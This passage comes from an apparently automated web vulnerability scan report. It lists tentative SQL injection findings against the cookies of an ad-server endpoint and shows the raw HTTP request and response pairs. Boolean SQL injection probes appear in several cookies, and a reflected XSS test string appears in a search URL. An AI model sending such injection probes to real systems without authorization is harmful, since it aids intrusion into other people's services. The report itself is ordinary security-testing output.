GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530'%20and%201%3d1--%20; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:08:53 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:08:53 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:08:53 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530'%20and%201%3d2--%20; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:08:53 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.28. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1994 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1994 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w'%20and%201%3d1--%20; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:09:54 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:09:54 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:09:54 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w'%20and%201%3d2--%20; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:09:54 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.29. http://tap.rubiconproject.com/oz/sensor [put_2054 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_2054 cookie appears to be vulnerable to SQL injection attacks. The payloads 45036362'%20or%201%3d1--%20 and 45036362'%20or%201%3d2--%20 were each submitted in the put_2054 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=54&k=southern+union:336,energy+transfer:320,buy+southern:208,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:114,billion+cnbc:80,union:72,transfer:72,southern:72,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,6+16:48,8+06:48,special+reports:48,datetime:46,billion:46,union+company:40,gas+production:40,will+buy:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,equity+will:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa445036362'%20or%201%3d1--%20; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; ses2=11953^33; csi2=2553662.js^7^1308233336^1308236745&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^39; csi15=2553663.js^8^1308234261^1308236739&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:06:21 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:06:22 GMT; Path=/
Set-Cookie: dq=45|4|41|0; Expires=Fri, 15-Jun-2012 15:06:22 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=54&k=southern+union:336,energy+transfer:320,buy+southern:208,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:114,billion+cnbc:80,union:72,transfer:72,southern:72,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,6+16:48,8+06:48,special+reports:48,datetime:46,billion:46,union+company:40,gas+production:40,will+buy:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,equity+will:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa445036362'%20or%201%3d2--%20; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; ses2=11953^33; csi2=2553662.js^7^1308233336^1308236745&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^39; csi15=2553663.js^8^1308234261^1308236739&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:06:22 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.30. http://tap.rubiconproject.com/oz/sensor [put_2101 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_2101 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_2101 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1'%20and%201%3d1--%20; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^5; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1'%20and%201%3d2--%20; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^5; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.31. http://tap.rubiconproject.com/oz/sensor [rdk cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The rdk cookie appears to be vulnerable to SQL injection attacks. The payloads 19874108'%20or%201%3d1--%20 and 19874108'%20or%201%3d2--%20 were each submitted in the rdk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=93&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+27:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,burgeoning+u:40,11+billion:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
